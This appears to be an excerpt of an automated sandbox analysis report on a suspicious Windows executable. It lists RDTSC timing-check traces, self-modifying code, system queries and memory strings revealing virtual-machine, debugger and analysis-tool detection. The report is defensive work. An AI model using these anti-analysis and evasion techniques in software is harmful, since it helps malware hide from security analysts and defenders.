Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F154D second address: 76F157B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C446h 0x00000009 sub eax, 51E11FB8h 0x0000000f jmp 00007F49E4E2C43Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F157B second address: 76F15E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov word ptr [edx+30h], ax 0x0000000b jmp 00007F49E47F2154h 0x00000010 mov ax, word ptr [esi+32h] 0x00000014 jmp 00007F49E47F2150h 0x00000019 mov word ptr [edx+32h], ax 0x0000001d pushad 0x0000001e mov cx, 3D1Dh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F49E47F2158h 0x00000029 jmp 00007F49E47F2155h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F15E9 second address: 76F1607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+34h] 0x00000009 jmp 00007F49E4E2C43Ch 0x0000000e mov dword ptr [edx+34h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1607 second address: 76F160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F160B second address: 76F1611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1611 second address: 76F1617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F1617 second address: 76F161B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F161B second address: 76F169E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, 00000700h 0x00000011 jmp 00007F49E47F2150h 0x00000016 jne 00007F4A53F30218h 0x0000001c jmp 00007F49E47F2150h 0x00000021 or dword ptr [edx+38h], FFFFFFFFh 0x00000025 pushad 0x00000026 jmp 00007F49E47F214Eh 0x0000002b pushad 0x0000002c call 00007F49E47F2150h 0x00000031 pop eax 0x00000032 mov ebx, 3CC9E3E6h 0x00000037 popad 0x00000038 popad 0x00000039 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F49E47F214Fh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F169E second address: 76F16BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F16BB second address: 76F16F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007F49E47F214Eh 0x00000012 pop esi 0x00000013 pushad 0x00000014 mov al, 55h 0x00000016 mov dh, A9h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76F16F0 second address: 76F16F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7740CA6 second address: 7740CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7740CAC second address: 7740CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F49E4E2C445h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F49E4E2C448h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7740CE8 second address: 7740CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7740CEC second address: 7740CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76806F9 second address: 7680708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7680708 second address: 768074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49E4E2C43Fh 0x00000009 xor al, 0000004Eh 0x0000000c jmp 00007F49E4E2C449h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esp 0x00000016 jmp 00007F49E4E2C43Ah 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push esi 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 768074F second address: 7680754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7680754 second address: 768079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 361B0CA4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F49E4E2C445h 0x00000015 jmp 00007F49E4E2C43Bh 0x0000001a popfd 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F49E4E2C445h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 768079E second address: 76807A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76807A4 second address: 76807A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7680B70 second address: 7680B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7680B76 second address: 7680C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F49E4E2C43Eh 0x00000010 mov ch, 72h 0x00000012 pop ebx 0x00000013 mov bh, al 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 movzx eax, di 0x0000001b mov ax, di 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F49E4E2C449h 0x00000027 sub eax, 308D36C6h 0x0000002d jmp 00007F49E4E2C441h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F49E4E2C440h 0x00000039 and ecx, 1070E768h 0x0000003f jmp 00007F49E4E2C43Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov ebp, esp 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7680C05 second address: 7680C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0B24 second address: 76D0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0B28 second address: 76D0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0B2E second address: 76D0B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0B34 second address: 76D0B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0B38 second address: 76D0BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F49E4E2C441h 0x00000012 mov ax, 5537h 0x00000016 pop ecx 0x00000017 call 00007F49E4E2C43Dh 0x0000001c mov eax, 2C77FA27h 0x00000021 pop eax 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 call 00007F49E4E2C449h 0x0000002a mov ebx, ecx 0x0000002c pop esi 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76D0BA9 second address: 76D0BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B003B second address: 76B008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F49E4E2C43Eh 0x00000010 and esp, FFFFFFF0h 0x00000013 jmp 00007F49E4E2C440h 0x00000018 sub esp, 44h 0x0000001b pushad 0x0000001c push eax 0x0000001d mov bx, FD40h 0x00000021 pop edx 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B008F second address: 76B0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0093 second address: 76B0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0099 second address: 76B00DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F49E47F214Fh 0x00000015 or ax, 17CEh 0x0000001a jmp 00007F49E47F2159h 0x0000001f popfd 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B00DB second address: 76B00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B00E1 second address: 76B0149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F49E47F2156h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F49E47F214Dh 0x0000001b xor eax, 50B6A416h 0x00000021 jmp 00007F49E47F2151h 0x00000026 popfd 0x00000027 call 00007F49E47F2150h 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0149 second address: 76B019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d mov edx, esi 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 jmp 00007F49E4E2C444h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 jmp 00007F49E4E2C43Eh 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F49E4E2C43Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B019A second address: 76B01AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F214Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B01AA second address: 76B01AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B01AE second address: 76B0208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F49E47F2157h 0x0000000e mov edi, dword ptr [ebp+08h] 0x00000011 jmp 00007F49E47F2156h 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F49E47F2157h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0208 second address: 76B0222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 303F313Ah 0x00000008 mov di, 2706h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lock bts dword ptr [edi], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0222 second address: 76B0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0226 second address: 76B022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B022C second address: 76B025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4A544A4338h 0x0000000f pushad 0x00000010 jmp 00007F49E47F214Ch 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B025C second address: 76B0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0260 second address: 76B0278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76B0278 second address: 76B0305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C441h 0x00000008 pushfd 0x00000009 jmp 00007F49E4E2C440h 0x0000000e adc si, 5598h 0x00000013 jmp 00007F49E4E2C43Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop esi 0x0000001d jmp 00007F49E4E2C446h 0x00000022 pop ebx 0x00000023 jmp 00007F49E4E2C440h 0x00000028 mov esp, ebp 0x0000002a jmp 00007F49E4E2C440h 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F49E4E2C447h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E075A second address: 76E075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E075E second address: 76E0762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0762 second address: 76E0768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0768 second address: 76E076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E076E second address: 76E0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E09C7 second address: 76E0AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F49E4E2C447h 0x00000011 or cl, 0000005Eh 0x00000014 jmp 00007F49E4E2C449h 0x00000019 popfd 0x0000001a jmp 00007F49E4E2C440h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F49E4E2C440h 0x00000026 mov ebp, esp 0x00000028 jmp 00007F49E4E2C440h 0x0000002d push dword ptr [ebp+04h] 0x00000030 pushad 0x00000031 movzx ecx, dx 0x00000034 pushfd 0x00000035 jmp 00007F49E4E2C443h 0x0000003a sbb ax, C87Eh 0x0000003f jmp 00007F49E4E2C449h 0x00000044 popfd 0x00000045 popad 0x00000046 push dword ptr [ebp+0Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F49E4E2C448h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AA9 second address: 76E0AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AF1 second address: 76E0AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AF7 second address: 76E0AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 76E0AFB second address: 76E0AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 775099A second address: 77509E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, B3C6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov ah, dl 0x00000011 pushfd 0x00000012 jmp 00007F49E47F2154h 0x00000017 adc ah, 00000068h 0x0000001a jmp 00007F49E47F214Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dl, byte ptr [ebp+14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F49E47F214Bh 0x0000002c pop esi 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509E5 second address: 77509EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509EB second address: 77509EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 77509EF second address: 7750A0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+10h] 0x0000000b jmp 00007F49E4E2C43Ah 0x00000010 and dl, 00000007h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 7750A0D second address: 7750A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSpecial instruction interceptor: First address: 120B784 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSpecial instruction interceptor: First address: 105F68E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSpecial instruction interceptor: First address: 121BE4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSpecial instruction interceptor: First address: 106196C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSpecial instruction interceptor: First address: 129BFFD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B69980 rdtsc 0_2_00B69980
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_009829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009829FF
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_0098255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0098255D
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: dZsdMl5Pwl.exeBinary or memory string: Hyper-V RAW
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: dZsdMl5Pwl.exe, 00000000.00000002.2480980346.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465962176.0000000001BA7000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2465726091.0000000001BA2000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2466101707.0000000001BBF000.00000004.00000020.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000003.2466035923.0000000001BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
